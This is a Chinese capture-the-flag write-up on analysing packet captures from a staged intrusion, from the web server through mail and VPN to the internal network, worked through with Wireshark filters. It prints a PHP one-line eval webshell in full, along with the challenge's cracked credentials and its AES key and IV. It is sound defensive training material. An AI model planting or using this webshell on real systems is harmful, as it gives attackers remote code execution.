流量分析例题

流量分析

一、题目背景

某公司内网网络被黑客渗透，简单了解，黑客首先攻击了一台web服务器，破解了后台的账户密码，随之利用破解的账号密码登陆了mail系统，然后获取了vpn的申请方式，然后登陆了vpn，在内网pwn掉了一台打印机，请根据提供的流量包回答下面有关问题

二、关卡列表

1 某公司内网网络被黑客渗透，请分析流量，给出黑客使用的扫描器

2 某公司内网网络被黑客渗透，请分析流量，得到黑客扫描到的登陆后台是(相对路径即可)

3 某公司内网网络被黑客渗透，请分析流量，得到黑客使用了什么账号密码登陆了web后台(形式:username/password)

<?php @eval($_POST['pass']); ?>

4 某公司内网网络被黑客渗透，请分析流量，得到黑客上传的webshell文件名是，内容是什么,提交webshell内容的base编码

5 某公司内网网络被黑客渗透，请分析流量，黑客在robots.txt中找到的flag是什么

6 某公司内网网络被黑客渗透，请分析流量，黑客找到的数据库密码是多少
7 某公司内网网络被黑客渗透，请分析流量，黑客在数据库中找到的hash_code是什么

8 某公司内网网络被黑客渗透，请分析流量，黑客破解了账号ijnu@test.com得到的密码是什么

9 某公司内网网络被黑客渗透，请分析流量，被黑客攻击的web服务器，网卡配置是是什么，提交网卡内网ip

10 某公司内网网络被黑客渗透，请分析流量，黑客使用了什么账号登陆了mail系统（形式: username/password）

11某公司内网网络被黑客渗透，请分析流量，黑客获得的vpn的ip是多少

三、解题过程

1.黑客使用的扫描器

打开webone.pcap数据包，按照协议类型排序一下，看到http协议的时候，发现了明显的awvs的特征
打开webone.pcap数据包 ，使用 http contains acunetix 发现了很多awvs的特征，说明是用awvs进行扫描的

2、黑客扫描到的登陆后台

登陆后台99%使用的是POST方法，直接使用过滤器过滤一下，然后追踪TCP流，看到302重定向，基本就是登陆成功了

http.request.method=="POST"

3 黑客登录使用的账号密码

但是查看过后我发现有很多302重定向登陆成功的结果，发现了很多账号密码，为了确定黑客所使用的，我找了一下黑客的ip地址，就是刚刚看到使用awvs进行扫描的源地址一定就是黑客的ip。然后使用过滤器再次过滤一下。

http.request.method=="POST" and ip.src==192.168.94.59 and http contains "rec=login"

4 webshell文件名和内容

通过下面的语句过滤一下数据，翻阅数据包后发现了一个a.php可能有点蹊跷，但是没有发现他是如何上传的，不过追踪一下TCP流，发现1234为传递值，并有base64加密过的内容，解密一下发现是php代码，以z1为传递值，z1也是使用了base64加密过的内容，再次解密一下得到了一个目录。总结上面的东西发现好像并没有什么作用。。。

http.request.method=="POST" and ip.src==192.168.94.59 and http

从上面的发现基本可以断定webshell是php写的，盲猜一下是php一句话木马，使用下面的语句过滤一下，没有发现数据，考虑到可能是tcp重传的原因，导致http中没追踪到，把http换成tcp再次过滤一下查看，最终找到了webshell的内容

http contains "<?php @eval"
tcp contains "<?php @eval"

5 robots.txt中的flag

直接导出http对象，在文本过滤器中选择robots.txt，将文件保存下来，即可获得flag

6 数据库密码

直接过滤http数据包，查看数据包的末尾，如果数据库登陆成功，那么http响应码应该为200,并且一般会包含database，逐一查看响应码为200的数据包，即可找到数据库密码

http.response.code==200 and http contains "database"

7 hash_code

打开webtwo流量包，
可以先利用这个关键字查找一下，但是没有发现什么，既然还是关于数据库的，在上面我们已经知道数据库的主机是10.3.3.101，可以先查这个ip有什么数据。

ip.src==10.3.3.101 and tcp contains "hash_code"

追踪tcp流，

8 黑客破解了账号ijnu@test.com得到的密码是什么

在webtwo.pcap这个流量包中，使用分组详情查询，即可查到密码

也可以直接用下面的语法进行过滤：

tcp contains "ijnu@test.com"

md5解密：

9 被黑客攻击的web服务器，网卡配置是什么，提交网卡内网ip

回到webone.pcap这个流量包中，这个问题问的是网卡的配置，一般网卡的名称都为eth0,所以可以利用这个关键词进行查询

tcp contains "eth0"

追踪一下tcp流，即可发现网卡的相关配置
内网IP为10.3.3.100

10 黑客使用了什么账号登陆了mail系统

这题需要综合来看mailtwo.pcap和mailtwo1.pcap两个数据包。
先查询下mailtwo.pcap这个数据包，一开始利用POST和mail过滤了下

http.request.method==POST && http contains "mail"
3oUuaEG4ux6xKD3RZ1iSew== 加密方式是AES
1234567812345678 iv偏移量
1234567812345678 必须经过md5加密后才可以使用的key
d959caadac9b13dcb3e609440135cf54
登陆用户名是wenwenni
获取到密码的加密方式，可能会理解base64，但不可能，AES加密。你需要找到我们key，和iv偏移量
找到它的加密算法：1234567812345678
找到登陆的用户名和密码
+ZgE14UGcFcyRGLI0/ZXPQ==
admin!@#123
(http contains "{\"\success":true}" or http.request.method=="POST") && ip.addr=192.168.94.59

发现黑客进行大量的登陆尝试，随便找了一个密码，先看看是什么加密的

不是base64,应该是AES加密，但需要找到加密的密钥，所以还是得重新过滤在服务器返回的信息中去查找，就先只过滤一下http,随便找一个状态码为200的追踪下TCP流，在服务器返回的信息中发现

这是AES的CBC加密，填充格式为ZeroPadding，密钥为字符串1234567812345678的hash值，偏移量为1234567812345678

既然加密方式知道了，下面只需要找到正确的账号密码即可
在过滤了http后，发现第一条数据有logout,查看了一下Cookie信息，发现了登陆的用户名
在42号数据请求中，发现登录用户为wenwenni，再查看一下返回数据44号中出现{“success”:true}，代表登陆成功。

(http contains "{\"success\":true}" or http.request.method=="POST") and ip.addr==192.168.94.59

发现都是在爆破，而且最后也没有出现成功的，利用这个过滤方法查询第二个包mailtwo1.pcap
从后往前看，18152是登陆成功的返回结果，对应的17126则应该就是正确的加密后的密码
aes解密工具：http://tool.chacuo.net/cryptaes
最终账号密码：

admin/admin!@#PASS123

11黑客获得的vpn的ip是多少

作业内容，需要对pptp知识点有一定了解，个人认为，iaip已经涵盖vpn知识点

例如IPSEC VPN GRE等 l2tp pptp

黑客VPN的ip：10.3.4.3

我们先统计IP的访问量，发现10.3.4.96，10.3.4.55，10.3.4.3访问量过大

接下来再查看SMB服务，发现10.3.4.96为服务器地址

最后我们查看10.3.4.55

因为10.3.4.3向10.3.4.55发送ping包，得出黑客获得的VPN的IP地址为10.3.4.3.